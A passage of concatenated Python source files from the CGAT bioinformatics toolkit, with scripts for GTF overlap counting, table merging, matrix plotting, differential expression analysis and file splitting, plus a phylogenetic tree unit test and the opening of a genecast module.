(self.mBasesUnique2, self.mBases2))))
class CounterGenes(Counter):
"""output only genes."""
mSeparator = ";"
def __init__(self, *args, **kwargs):
Counter.__init__(self, *args, **kwargs)
def getHeader(self):
h = ["genes", "gene2"]
return "\t".join(h)
def _run(self, filename, idx):
# iterate over exons
infile = IOTools.openFile(filename, "r")
it = GTF.iterator(infile)
keys = set()
for this in it:
try:
intervals = idx[this.contig].find(this.start, this.end)
except KeyError:
continue
if len(intervals) == 0:
continue
for i in intervals:
key = "%s-%s" % (this.gene_id, i.value.gene_id)
if key not in keys:
self.write(this.gene_id, i.value.gene_id)
keys.add(key)
infile.close()
def run(self, filename1, filename2):
"""count overlap between two gtf files."""
E.info("counting started for %s versus %s" % (filename1, filename2))
idx2 = self.buildIndex(filename2)
self._run(filename1, idx2)
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if argv is None:
argv = sys.argv
parser = E.OptionParser(
version="%prog version: $Id: gtfs2graph.py 2781 2009-09-10 11:33:14Z andreas $", usage=globals()["__doc__"])
parser.add_option("-s", "--ignore-strand", dest="ignore_strand", action="store_true",
help="ignore strand information [default=%default].")
parser.add_option("-u", "--update", dest="filename_update", type="string",
help="if filename is given, previous results will be read from there and only changed sets will be computed [default=%default].")
parser.add_option("-p", "--pattern-identifier", dest="pattern_id", type="string",
help="pattern to convert a filename to an id [default=%default].")
parser.add_option("-g", "--genes-tsv-file", dest="genes", action="store_true",
help="only output gene stats (includes gene lists) [default=%default].")
parser.set_defaults(
ignore_strand=False,
filename_update=None,
pattern_id="(.*).gtf",
genes=False,
)
(options, args) = E.Start(parser)
if len(args) != 2:
        print globals()["__doc__"]
raise ValueError("two arguments are required")
if options.genes:
counter = CounterGenes(options.stdout)
else:
counter = Counter(options.stdout)
options.stdout.write(counter.getHeader() + "\n")
counter.run(args[0], args[1])
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
#### File: cgat/scripts/merge_tables.py
```python
import sys
import string
import CGAT.Experiment as E
parser = E.OptionParser(
version="%prog version: $Id$")
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if argv is None:
argv = sys.argv
parser.add_option("-t", "--table", dest="tables", type="string",
help="tables to merge.",
action="append")
parser.set_defaults(
tables=[])
(options, args) = E.Start(parser)
if len(options.tables) < 1:
raise "please specify at least one table."
files = []
for t in options.tables:
files.append(open(t, "r"))
while 1:
frags = []
stop = False
for f in files:
l = f.readline()
if not l:
stop = True
break
frags.append(l[:-1])
if stop:
break
print string.join(frags, "\t")
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
#### File: cgat/scripts/plot_matrix.py
```python
import sys
import os
import numpy
import pylab
import CGAT.MatlabTools as MatlabTools
import CGAT.Experiment as E
param_grid_size_x = 6
param_hardcopy = "test.ps"
param_chunk_size = 2000
param_background = 255
def GetRange(matrix, r):
"""get ranges from a range string.
can be two numbers separated by comma, or min/max + a number
"""
rr = r.split(",")
if len(rr) != 2:
raise "please supply two values for range separated by a comma."
vv = []
for x in rr:
if x == "min":
v = min(matrix.flat)
elif x == "max":
v = max(matrix.flat)
else:
v = float(x)
vv.append(v)
return vv
def plotMatrix(matrix, color_scheme, row_headers, col_headers, vmin, vmax, options):
pylab.imshow(matrix,
cmap=color_scheme,
origin='lower',
vmax=vmax,
vmin=vmin,
interpolation='nearest')
# offset=0: x=center,y=center
# offset=0.5: y=top/x=right
offset = 0.0
if options.xticks:
pylab.xticks([offset + x for x in range(len(options.xticks))],
options.xticks,
rotation="vertical",
fontsize="8")
else:
if col_headers and len(col_headers) < 100:
pylab.xticks([offset + x for x in range(len(col_headers))],
col_headers,
rotation="vertical",
fontsize="8")
if options.yticks:
pylab.yticks([offset + y for y in range(len(options.yticks))],
options.yticks,
fontsize="8")
else:
if row_headers and len(row_headers) < 100:
pylab.yticks([offset + y for y in range(len(row_headers))],
row_headers,
fontsize="8")
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if argv is None:
argv = sys.argv
parser = E.OptionParser(
version="%prog version: $Id: plot_matrix.py 2782 2009-09-10 11:40:29Z andreas $")
parser.add_option("-c", "--columns", dest="columns", type="string",
help="columns to take from table.")
parser.add_option("-a", "--hardcopy", dest="hardcopy", type="string",
help="write hardcopy to file.", metavar="FILE")
parser.add_option("-f", "--file", dest="input_filename", type="string",
help="filename with table data.",
metavar="FILE")
parser.add_option("-p", "--plot", dest="plot", type="string",
help="plots to plot.",
action="append")
parser.add_option("-t", "--threshold", dest="threshold", type="float",
help="min threshold to use for counting method.")
parser.add_option("-o", "--colours", dest="colours", type="int",
help="column with colour information.")
parser.add_option("-l", "--plot-labels", dest="labels", type="string",
help="column labels for x and y in matched plots.")
parser.add_option("-e", "--header-names", dest="headers", action="store_true",
help="headers are supplied in matrix.")
parser.add_option("--no-headers", dest="headers", action="store_false",
help="headers are not supplied in matrix.")
parser.add_option("--normalize", dest="normalize", action="store_true",
help="normalize matrix.")
parser.add_option("--palette", dest="palette", type="choice",
choices=("rainbow", "gray", "blue-white-red",
"autumn", "bone", "cool", "copper", "flag", "gray", "hot", "hsv", "jet", "pink", "prism",
"spring", "summer", "winter", "spectral",
"RdBu", "RdGy", "BrBG", "BuGn", "Blues", "Greens", "Reds", "Oranges", "Greys"),
help="colour palette [default=%Default]")
parser.add_option("--reverse-palette", dest="reverse_palette", action="store_true",
help="reverse the palette [default=%default].")
parser.add_option("", "--xrange", dest="xrange", type="string",
help="xrange.")
parser.add_option("", "--yrange", dest="yrange", type="string",
help="yrange.")
parser.add_option("", "--zrange", dest="zrange", type="string",
help="zrange.")
parser.add_option("", "--xticks", dest="xticks", type="string",
help="xticks.")
parser.add_option("", "--yticks", dest="yticks", type="string",
help="yticks.")
parser.add_option("--bar-format", dest="bar_format", type="string",
help="format for ticks on colourbar.")
parser.add_option("--title", dest="title", type="string",
help="title to use.")
parser.add_option("--missing-value", dest="missing", type="float",
help="value to use for missing data.")
parser.add_option("--subplots", dest="subplots", type="string",
help="split matrix into several subplots. Supply number of rows and columns separated by a comma.")
parser.set_defaults(
hardcopy=None,
input_filename="-",
columns="all",
statistics=[],
plot=[],
threshold=0.0,
labels="x,y",
colours=None,
xrange=None,
yrange=None,
zrange=None,
palette=None,
reverse_palette=False,
xticks=None,
yticks=None,
normalize=False,
bar_format="%1.1f",
headers=True,
missing=None,
title=None,
subplots=None)
(options, args) = E.Start(parser)
# import matplotlib/pylab. Has to be done here
# for batch scripts without GUI.
import matplotlib
if options.hardcopy:
matplotlib.use("cairo")
import pylab
if len(args) > 0:
options.input_filename = ",".join(args)
if options.xticks:
options.xticks = options.xticks.split(",")
if options.yticks:
options.yticks = options.yticks.split(",")
if options.xrange:
options.xrange = map(float, options.xrange.split(","))
if options.yrange:
options.yrange = map(float, options.yrange.split(","))
if options.columns != "all":
options.columns = map(lambda x: int(x) - 1, options.columns.split(","))
filenames = options.input_filename.split(",")
if len(filenames) > 1:
nsubrows = (len(filenames) / 3) + 1
nsubcols = 3
elif options.subplots:
nsubrows, nsubcols = [int(x) for x in options.subplots.split(",")]
else:
nsubrows, nsubcols = 1, 1
nsubplots = nsubrows * nsubcols
# Setting up color maps
if options.palette:
if options.palette == "gray":
_gray_data = {'red': ((0., 1, 1), (1., 0, 0)),
'green': ((0., 1, 1), (1., 0, 0)),
'blue': ((0., 1, 1), (1., 0, 0))}
LUTSIZE = pylab.rcParams['image.lut']
colors_gray = matplotlib.colors.LinearSegmentedColormap(
'gray', _gray_data, LUTSIZE)
plot_id = 0
for filename in filenames:
plot_id += 1
pylab.subplot(nsubrows, nsubcols, plot_id)
if filename == "-":
infile = sys.stdin
else:
infile = open(filename, "r")
matrix, row_headers, col_headers = MatlabTools.readMatrix(infile,
numeric_type=numpy.float32,
take=options.columns,
headers=options.headers,
missing=options.missing)
if min(matrix.flat) == max(matrix.flat):
options.stderr.write("matrix is uniform - no plotting done.\n")
sys.exit(0)
if options.normalize:
v = max(matrix.flat)
matrix = matrix / v
if options.zrange:
options.zrange = GetRange(matrix, options.zrange)
nrows, ncols = matrix.shape
if options.palette:
if options.palette == "gray":
color_scheme = colors_gray
else:
if options.reverse_palette:
color_scheme = eval("pylab.cm.%s_r" % options.palette)
else:
color_scheme = eval("pylab.cm.%s" % options.palette)
else:
color_scheme = None
if options.zrange:
vmin, vmax = options.zrange
matrix[matrix < vmin] = vmin
matrix[matrix > vmax] = vmax
else:
vmin, vmax = None, None
if options.subplots:
if nsubcols > 1:
increment_x = int(float(nrows + 1) / nsubcols)
increment_y = nrows
x = 0
y = 0
for n in range(nsubplots):
pylab.subplot(nsubrows, nsubcols, plot_id)
plot_id += 1
print n, "rows=", nsubrows, "cols=", nsubcols, y, y + increment_y, x, x + increment_x
print matrix[y:y + increment_y, x:x + increment_x].shape
print matrix.shape
plotMatrix(matrix[y:y + increment_y, x:x + increment_x],
color_scheme,
row_headers[y:y + increment_y],
col_headers[x:x + increment_x],
0, 100, options)
x += increment_x
elif nsubrows > 1:
increment_x = int(float(ncols + 1) / nsubrows)
x = 0
for n in range(nsubplots):
pylab.subplot(nsubrows, nsubcols, plot_id)
plot_id += 1
plotMatrix(matrix[0:nrows, x:x + increment_x],
color_scheme,
row_headers,
col_headers[x:x + increment_x],
vmin, vmax, options)
x += increment_x
else:
plotMatrix(
matrix, color_scheme, row_headers, col_headers, vmin, vmax, options)
if options.xrange:
pylab.xlim(options.xrange)
if options.yrange:
pylab.ylim(options.yrange)
if options.labels:
xlabel, ylabel = options.labels.split(",")
pylab.xlabel(xlabel)
pylab.ylabel(ylabel)
if not options.subplots:
pylab.colorbar(format=options.bar_format)
if options.title is None or options.title != "":
pylab.title(filename)
if options.hardcopy:
pylab.savefig(os.path.expanduser(options.hardcopy))
else:
pylab.show()
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
#### File: cgat/scripts/runExpression.py
```python
import sys
import os
import tempfile
from rpy2.robjects import r as R
import rpy2.robjects.numpy2ri
import CGAT.Experiment as E
import CGAT.Expression as Expression
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if not argv:
argv = sys.argv
# setup command line parser
parser = E.OptionParser(version="%prog version: $Id$",
usage=globals()["__doc__"])
parser.add_option("-t", "--tags-tsv-file", dest="input_filename_tags",
type="string",
help="input file with tag counts [default=%default].")
parser.add_option(
"--result-tsv-file", dest="input_filename_result",
type="string",
help="input file with results (for plotdetagstats) "
"[default=%default].")
parser.add_option("-d", "--design-tsv-file", dest="input_filename_design",
type="string",
help="input file with experimental design "
"[default=%default].")
parser.add_option("-o", "--outfile", dest="output_filename", type="string",
help="output filename [default=%default].")
parser.add_option("-m", "--method", dest="method", type="choice",
choices=(
"deseq", "edger", "deseq2",
"ttest",
"mock", "summary",
"dump", "spike",
"plottagstats",
"plotdetagstats"),
help="differential expression method to apply "
"[default=%default].")
parser.add_option("--deseq-dispersion-method",
dest="deseq_dispersion_method",
type="choice",
choices=("pooled", "per-condition", "blind"),
help="dispersion method for deseq [default=%default].")
parser.add_option("--deseq-fit-type", dest="deseq_fit_type", type="choice",
choices=("parametric", "local"),
help="fit type for deseq [default=%default].")
parser.add_option("--deseq-sharing-mode",
dest="deseq_sharing_mode",
type="choice",
choices=("maximum", "fit-only", "gene-est-only"),
help="deseq sharing mode [default=%default].")
parser.add_option(
"--edger-dispersion",
dest="edger_dispersion", type="float",
help="dispersion value for edgeR if there are no replicates "
"[default=%default].")
parser.add_option("-f", "--fdr", dest="fdr", type="float",
help="fdr to apply [default=%default].")
parser.add_option("-p", "--pseudocounts", dest="pseudo_counts",
type="float",
help="pseudocounts to add for mock analyis "
"[default=%default].")
parser.add_option("-R", "--output-R-code", dest="save_r_environment",
type="string",
help="save R environment [default=%default].")
parser.add_option("-r", "--reference-group", dest="ref_group",
type="string",
help="Group to use as reference to compute "
"fold changes against [default=$default]")
parser.add_option("--filter-min-counts-per-row",
dest="filter_min_counts_per_row",
type="int",
help="remove rows with less than this "
"number of counts in total [default=%default].")
parser.add_option("--filter-min-counts-per-sample",
dest="filter_min_counts_per_sample",
type="int",
help="remove samples with a maximum count per sample of "
"less than this number [default=%default].")
parser.add_option("--filter-percentile-rowsums",
dest="filter_percentile_rowsums",
type="int",
help="remove percent of rows with "
"lowest total counts [default=%default].")
parser.add_option("--deseq2-design-formula",
dest="model",
type="string",
help="Design formula for DESeq2")
parser.add_option("--deseq2-contrasts",
dest="contrasts",
type="string",
help=("contrasts for post-hoc testing writen"
" variable:control:treatment,..."))
parser.add_option("--deseq2-plot",
dest="plot",
type="int",
help=("draw plots during deseq2 analysis"))
parser.set_defaults(
input_filename_tags=None,
input_filename_result=None,
input_filename_design=None,
output_filename=sys.stdout,
method="deseq",
fdr=0.1,
deseq_dispersion_method="pooled",
deseq_fit_type="parametric",
deseq_sharing_mode="maximum",
edger_dispersion=0.4,
ref_group=None,
save_r_environment=None,
filter_min_counts_per_row=1,
filter_min_counts_per_sample=10,
filter_percentile_rowsums=0,
pseudo_counts=0,
spike_foldchange_max=4.0,
spike_expression_max=5.0,
spike_expression_bin_width=0.5,
spike_foldchange_bin_width=0.5,
spike_max_counts_per_bin=50,
model=None,
plot=1
)
# add common options (-h/--help, ...) and parse command line
(options, args) = E.Start(parser, argv=argv, add_output_options=True)
if options.input_filename_tags == "-":
fh = tempfile.NamedTemporaryFile(delete=False)
fh.write("".join([x for x in options.stdin]))
fh.close()
options.input_filename_tags = fh.name
else:
fh = None
# load tag data and filter
if options.method in ("deseq2", "deseq", "edger", "mock", "ttest"):
assert options.input_filename_tags and os.path.exists(
options.input_filename_tags)
assert options.input_filename_design and os.path.exists(
options.input_filename_design)
Expression.loadTagData(options.input_filename_tags,
options.input_filename_design)
nobservations, nsamples = Expression.filterTagData(
filter_min_counts_per_row=options.filter_min_counts_per_row,
filter_min_counts_per_sample=options.filter_min_counts_per_sample,
filter_percentile_rowsums=options.filter_percentile_rowsums)
if nobservations == 0:
E.warn("no observations - no output")
return
if nsamples == 0:
E.warn("no samples remain after filtering - no output")
return
sample_names = R('''colnames(countsTable)''')
E.info("%i samples to test at %i observations: %s" %
(nsamples, nobservations,
",".join(sample_names)))
try:
if options.method == "deseq2":
Expression.runDESeq2(
outfile=options.output_filename,
outfile_prefix=options.output_filename_pattern,
fdr=options.fdr,
ref_group=options.ref_group,
model=options.model,
contrasts=options.contrasts,
plot=options.plot
)
elif options.method == "deseq":
Expression.runDESeq(
outfile=options.output_filename,
outfile_prefix=options.output_filename_pattern,
fdr=options.fdr,
dispersion_method=options.deseq_dispersion_method,
fit_type=options.deseq_fit_type,
sharing_mode=options.deseq_sharing_mode,
ref_group=options.ref_group,
)
elif options.method == "edger":
Expression.runEdgeR(
outfile=options.output_filename,
outfile_prefix=options.output_filename_pattern,
fdr=options.fdr,
ref_group=options.ref_group,
dispersion=options.edger_dispersion)
elif options.method == "mock":
Expression.runMockAnalysis(
outfile=options.output_filename,
outfile_prefix=options.output_filename_pattern,
ref_group=options.ref_group,
pseudo_counts=options.pseudo_counts,
)
elif options.method == "summary":
Expression.outputTagSummary(
options.input_filename_tags,
options.stdout,
options.output_filename_pattern,
filename_design=options.input_filename_design
)
elif options.method == "dump":
assert options.input_filename_tags and os.path.exists(
options.input_filename_tags)
Expression.dumpTagData(options.input_filename_tags,
options.input_filename_design,
outfile=options.stdout)
elif options.method == "plottagstats":
assert options.input_filename_tags and os.path.exists(
options.input_filename_tags)
Expression.plotTagStats(
options.input_filename_tags,
options.input_filename_design,
outfile_prefix=options.output_filename_pattern)
elif options.method == "plotdetagstats":
assert options.input_filename_result and os.path.exists(
options.input_filename_result)
Expression.plotDETagStats(
options.input_filename_result,
outfile_prefix=options.output_filename_pattern)
elif options.method == "spike":
Expression.outputSpikeIns(
options.input_filename_tags,
options.stdout,
options.output_filename_pattern,
filename_design=options.input_filename_design,
foldchange_max=options.spike_foldchange_max,
expression_max=options.spike_expression_max,
max_counts_per_bin=options.spike_max_counts_per_bin,
expression_bin_width=options.spike_expression_bin_width,
foldchange_bin_width=options.spike_foldchange_bin_width,
)
elif options.method == "ttest":
Expression.runTTest(
outfile=options.output_filename,
outfile_prefix=options.output_filename_pattern,
fdr=options.fdr)
except rpy2.rinterface.RRuntimeError:
if options.save_r_environment:
E.info("saving R image to %s" % options.save_r_environment)
R['save.image'](options.save_r_environment)
raise
if fh and os.path.exists(fh.name):
os.unlink(fh.name)
if options.save_r_environment:
R['save.image'](options.save_r_environment)
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
#### File: cgat/scripts/split_file.py
```python
import sys
import re
import string
import os
import getopt
import CGAT.Experiment as E
USAGE = """python %s < stdin > stdout
split a file into chunks.
OPTIONS:
-h, --help print this message.
-v, --verbose= loglevel.
-r, --split-regex split at regular expression
-a, --after split after match
-s, --skip do not echo match
-p, --pattern-output pattern of output files (has to contain %s)
-c, --column= split according to column
-m, --map= split according to map
-d, --dry-run echo files that would be created,
but do not create any.
-e, --header-names add header to each file
-r, --remove-key remove key column
-append append data to existing files.
--pattern-identifier if given, use this pattern to extract
id from column.
--chunk-size Number of matching records in each output file
--version output version information
""" % (sys.argv[0], "s")
def CreateOpen(file, mode="w", dry_run=False, header=None):
"""open file. Check first, if directory exists.
"""
if dry_run:
print "# opening file %s" % file
return open("/dev/null", mode)
if mode in ("w", "a"):
dirname = os.path.dirname(file)
if dirname and not os.path.exists(dirname):
os.makedirs(dirname)
if os.path.exists(file):
existed = True
else:
existed = False
f = open(file, mode)
if header and not existed:
f.write(header + "\n")
return f
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if argv is None:
argv = sys.argv
param_long_options = [
"verbose=", "help", "split-regex=", "after", "pattern-output=", "skip",
"column=", "map=", "dry-run",
"header", "remove-key", "append", "pattern-identifier=", "version",
"chunk-size="]
param_short_options = "v:hr:ap:sc:dek"
param_loglevel = 1
param_split_at_regex = None
param_after = None
param_skip = None
param_pattern_output = "%s.chunk"
param_split_column = None
param_filename_map = None
param_dry_run = False
param_header = False
param_remove_key = False
param_append = "w"
param_pattern_identifier = None
param_chunk_size = 1
try:
optlist, args = getopt.getopt(sys.argv[1:],
param_short_options,
param_long_options)
except getopt.error, msg:
print USAGE, msg
sys.exit(1)
for o, a in optlist:
if o in ("-v", "--verbose"):
param_loglevel = int(a)
elif o in ("--version", ):
print "version="
sys.exit(0)
elif o in ("-h", "--help"):
print USAGE
sys.exit(0)
elif o in ("-r", "--split-regex"):
param_split_at_regex = re.compile(a)
elif o in ("-a", "--after"):
param_after = 1
elif o in ("-s", "--skip"):
param_skip = 1
elif o in ("-p", "--pattern-output"):
param_pattern_output = a
elif o in ("-c", "--column"):
param_split_column = int(a) - 1
elif o in ("-m", "--map"):
param_filename_map = a
elif o in ("-d", "--dry-run"):
param_dry_run = True
elif o in ("-e", "--header-names"):
param_header = True
elif o in ("-r", "--remove-key"):
param_remove_key = True
elif o == "--append":
param_append = "a"
elif o == "--pattern-identifier":
param_pattern_identifier = re.compile(a)
elif o == "--chunk-size":
param_chunk_size = int(a)
print E.GetHeader()
print E.GetParams()
mymap = {}
if param_filename_map:
infile = open(param_filename_map, "r")
for line in infile:
if line[0] == "#":
continue
data = line[:-1].split("\t")[:2]
mymap[data[0]] = data[1]
filenames = set()
found = set()
ninput, noutput = 0, 0
if param_split_column is not None:
header = None
files = {}
for line in sys.stdin:
if line[0] == "#":
continue
ninput += 1
if param_header:
if not header:
header = line[:-1]
continue
else:
header = None
data = line[:-1].split("\t")
try:
key = data[param_split_column]
except ValueError:
continue
if param_pattern_identifier:
key = param_pattern_identifier.search(key).groups()[0]
if mymap:
if key in mymap:
key = mymap[key]
else:
continue
found.add(key)
filename = re.sub("%s", key, param_pattern_output)
filenames.add(filename)
if filename not in files:
# reset if too many files are open
if len(files) > 1000:
if param_loglevel >= 1:
print "# resetting all files."
sys.stdout.flush()
for f in files.values():
f.close()
files = {}
files[filename] = CreateOpen(
filename, "a", param_dry_run, header)
if param_remove_key:
del data[param_split_column]
files[filename].write(string.join(data, "\t") + "\n")
else:
files[filename].write(line)
noutput += 1
for f in files.values():
f.close()
else:
file_id = 0
filename = re.sub("%s", str(file_id), param_pattern_output)
outfile = CreateOpen(filename, param_append, param_dry_run)
nlines = 0
header = param_header
split = 0
for line in sys.stdin:
if param_split_at_regex and param_split_at_regex.search(line[:-1]):
split += 1
if split == param_chunk_size:
if param_after:
nlines += 1
outfile.write(line)
if nlines > 0:
outfile.close()
file_id += 1
filename = re.sub("%s", str(file_id), param_pattern_output)
outfile = CreateOpen(
filename, param_append, param_dry_run, header)
filenames.add(filename)
split = 0
nlines = 0
if param_after or param_skip:
continue
outfile.write(line)
nlines += 1
outfile.close()
if param_loglevel >= 1:
sys.stdout.write(
"# ninput=%i, noutput=%i, nfound=%i, nnotfound=%i, nfiles=%i\n" % (
ninput,
noutput,
len(found),
len(set(mymap).difference(found)),
len(filenames)))
print E.GetFooter()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
#### File: cgat/scripts/split_gff.py
```python
import sys
import os
import CGAT.GTF as GTF
import CGAT.IOTools as IOTools
import CGAT.Experiment as E
class OutputChunk:
def __init__(self, output_filename_pattern, dry_run=False):
self.nchunk = 0
self.output_filename_pattern = output_filename_pattern
self.dry_run = dry_run
def createOpen(self, mode="w", header=None):
"""open file. Check first, if directory exists.
"""
self.nchunk += 1
filename = self.output_filename_pattern % self.nchunk
if self.dry_run:
E.info("opening file %s" % filename)
return open("/dev/null", mode)
if mode in ("w", "a"):
dirname = os.path.dirname(filename)
if dirname and not os.path.exists(dirname):
os.makedirs(dirname)
if os.path.exists(filename):
existed = True
else:
existed = False
f = IOTools.openFile(filename, mode)
if header and not existed:
f.write(header + "\n")
return f
def __call__(self, chunk):
"""output a chunk into a new file."""
outfile = self.createOpen()
for c in chunk:
outfile.write(str(c) + "\n")
outfile.close()
return len(chunk)
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if argv is None:
argv = sys.argv
parser = E.OptionParser(
version="%prog version: $Id$",
usage=globals()["__doc__"])
parser.add_option(
"-i", "--min-chunk-size", dest="min_chunk_size", type="int",
help="minimum chunk size [default=%default].")
parser.add_option(
"-n", "--dry-run", dest="dry_run", action="store_true",
help="do not create any files [default=%default].")
parser.set_defaults(
method="overlap",
dry_run=False,
min_chunk_size=2,
output_filename_pattern="%06i.chunk",
)
(options, args) = E.Start(parser, add_output_options=True)
gffs = GTF.iterator(options.stdin)
ninput, noutput, nchunks = 0, 0, 0
outputChunk = OutputChunk(options.output_filename_pattern,
dry_run=options.dry_run)
if options.method == "overlap":
last_contig, last_to = None, None
chunk = []
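        # group consecutive records into chunks: a new chunk starts once the
        # current one holds at least min_chunk_size records and the next record
        # no longer overlaps it (different contig or start beyond the last end)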
for gff in gffs:
ninput += 1
if len(chunk) >= options.min_chunk_size and \
(gff.contig != last_contig or
gff.start > last_to):
noutput += outputChunk(chunk)
nchunks += 1
chunk = []
last_contig, last_to = gff.contig, gff.end
chunk.append(gff)
last_to = max(gff.end, last_to)
noutput += outputChunk(chunk)
nchunks += 1
E.info("ninput=%i, noutput=%i, nchunks=%i" % (ninput, noutput, nchunks))
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
#### File: cgat/scripts/split_links.py
```python
import os
import sys
import re
import CGAT.Experiment as E
open_files = {}
def WriteLine(a, b, line, prefix="%s-%s"):
key1 = prefix % (a, b)
key2 = prefix % (b, a)
if key1 in open_files or os.path.exists(key1):
key = key1
else:
key = key2
if key not in open_files:
open_files[key] = open(key, "a")
f = open_files[key]
f.write(line)
f.flush()
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if argv is None:
argv = sys.argv
parser = E.OptionParser(
version="%prog version: $Id: split_links.py 2781 2009-09-10 11:33:14Z andreas $")
parser.add_option("-m", "--method", dest="method", type="string",
help="method for splitting.")
parser.add_option("-r", "--regex", dest="regex", type="string",
help="regex to find prefix.")
parser.add_option("-o", "--output-section", dest="output", type="string",
help="output filename.")
parser.add_option("-t", "--targets", dest="targets", type="string",
help="output filename.")
parser.set_defaults()
(options, args) = E.Start(parser)
if options.targets:
options.targets = options.targets.split(",")
nsame = 0
ndiff = 0
if options.method == "prefix":
for line in sys.stdin:
if line[0] == "#":
continue
data = line[:-1].split("\t")
g1 = re.search(options.regex, data[0]).groups()[0]
g2 = re.search(options.regex, data[1]).groups()[0]
if g1 == g2:
for t in options.targets:
if g1 == t:
continue
WriteLine(g1, t, line, options.output)
nsame += 1
else:
WriteLine(g1, g2, line, options.output)
ndiff += 1
print "nsame=%i, ndiff=%i" % (nsame, ndiff)
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
#### File: cgat/scripts/table2graph.py
```python
import sys
import CGAT.Experiment as E
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if not argv:
argv = sys.argv
# setup command line parser
parser = E.OptionParser(
version="%prog version: $Id$", usage=globals()["__doc__"])
parser.add_option(
"-e", "--header-names", dest="headers", type="string",
help="',' separated list of node headers [default=%default].")
parser.set_defaults(
headers="node1,node2",
)
# add common options (-h/--help, ...) and parse command line
(options, args) = E.Start(parser, argv=argv)
# do sth
ninput, nskipped, noutput = 0, 0, 0
first = True
for line in options.stdin:
if line.startswith("#"):
continue
data = line[:-1].split("\t")
if first:
headers = options.headers.split(",")
if len(data) >= 2:
extra = "\t%s" % ("\t".join(data[2:]))
else:
extra = ""
options.stdout.write("%s%s\n" % ("\t".join(headers), extra))
first = False
continue
ninput += 1
if len(data) < 2:
continue
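        # each remaining column holds a ';'-separated list; emit one row per
        # aligned element, pairing it with the identifier in the first column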
values = [x.split(";") for x in data[1:] if x != ""]
if len(values) == 0:
nskipped += 1
continue
l = min([len(x) for x in values])
assert l == max(
[len(x) for x in values]), "unequal number of fields in line '%s'" % line[:-1]
node1 = [[data[0]] * l]
for n in zip(*(node1 + values)):
options.stdout.write("\t".join(n) + "\n")
noutput += 1
E.info("ninput=%i, noutput=%i, nskipped=%i" % (ninput, noutput, nskipped))
# write footer and output benchmark information.
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
#### File: cgat/tests/Tree_test.py
```python
from CGAT.Tree import Tree
import unittest
class MidPointRootingCheck(unittest.TestCase):
trees = [
"(A:1,((B:1,C:1):1,D:1):1,(E:1,F:1):1);",
"((A:1,(B:1,C:1):1):0.5,((D:1,E:1):1,F:1):0.5);",
"(A:1,B:1);",
"((A:1,B:1):1,C:5);",
"((A:1,B:1):10,(D:1,C:5):1);",
"((A:0,B:0):1,(D:0,C:5):0);",
"((A:5,B:1):1,D:1);",
"((A:0,(B:0,(((C:0,D:0):0,E:2.11270):0,((F:0,G:0):0,(H:0,I:0):0):0):0):0):0,((J:0,K:0.12496):0,L:0):0,M:0);",
"(ID000001:1.19640,(((ID000004:0.41850,ID000006:0.06490):0.12010,ID000005:0.30820):0.31570,ID000003:0.38540):0.00000,ID000002:1.27200);",
"(A:0.19174,(B:0.58034,((C:0.98961,D:0.52099):0.14598,(E:0.00000,F:0.00000):0.49107):0.67347):0.01248,G:0.34146);",
"(((((A:0.10670,B:0.35050):0.03480,C:0.13720):0.23850,D:0.31120):0.12570,E:0.38110):0.04180,F:0.79130);",
"(ID000001:0.83310,(((ID000005:0.10670,ID000004:0.35050):0.03480,ID000006:0.13720):0.23850,ID000003:0.31120):0.12570,ID000002:0.38110);",
]
def testLength(self):
"""midpoint rooting."""
for tree in self.trees:
t = Tree(tree)
t.root_midpoint()
# test 1: only two children for root
s = t.node(t.root).succ
self.assertEqual(len(s), 2)
# calculate tree length on either side of tree
d2leaves = [0] * (max(t.chain.keys()) + 1)
def dist2leaves(node_id):
node = t.node(node_id)
if node.succ:
d2leaves[node_id] = max(
[d2leaves[s] + t.node(s).data.branchlength for s in node.succ])
t.dfs(t.root, post_function=dist2leaves)
d1 = d2leaves[s[0]] + t.node(s[0]).data.branchlength
d2 = d2leaves[s[1]] + t.node(s[1]).data.branchlength
# test 2: distance to children equal on both sides
self.assertAlmostEqual(d1, d2, 5,
"assertion error: %s != %s for tree %s -> %s" %
(str(d1), str(d2),
tree, t.to_string(branchlengths_only=True)))
def testNegativeBranchLengths(self):
for tree in self.trees:
t = Tree(tree)
t.root_midpoint()
for n, node in t.chain.items():
                self.assertFalse(node.data.branchlength < 0,
                                 "assertion error: negative branchlength for tree %s -> %s" %
                                 (tree, t.to_string(branchlengths_only=True)))
def testTruncate(self):
t = Tree("(A:1,((B:1,C:1):1,D:1):1,(E:1,F:1):1);")
t.truncate(7, "E+F")
result = t.to_string(branchlengths_only=True,
branchlength_format="%i",
format="nh")
self.assertEqual(result, "(A:1,((B:1,C:1):1,D:1):1,E+F:1);")
t = Tree("(A:1,((B:1,C:1):1,D:1):1,(E:1,F:1):1);")
t.truncate(8)
result = t.to_string(branchlengths_only=True,
branchlength_format="%i",
format="nh")
self.assertEqual(result, "(A:1,((B:1,C:1):1,D:1):1,F:1);")
if __name__ == "__main__":
unittest.main()
``` |
{
"source": "861934367/genecast",
"score": 2
} |
#### File: lib/genecast_package/core.py
```python
import matplotlib as mpl
mpl.use('Agg')
import warnings
warnings.filterwarnings("ignore")
import itertools
import seaborn as sns
import matplotlib.pylab as plt
import matplotlib.colors as mc
from genecast_package.svm_analysis import feature_select, evaluate_model
from sklearn.decomposition import PCA
from collections import OrderedDict
from collections import defaultdict
import datetime
import pandas as pd
import os
import sh
def z_score(data, axis):
if axis == 1:
z_scored = data
else:
z_scored = data.T
z_scored = (z_scored - z_scored.mean()) / z_scored.std()
if axis == 1:
return z_scored
else:
return z_scored.T
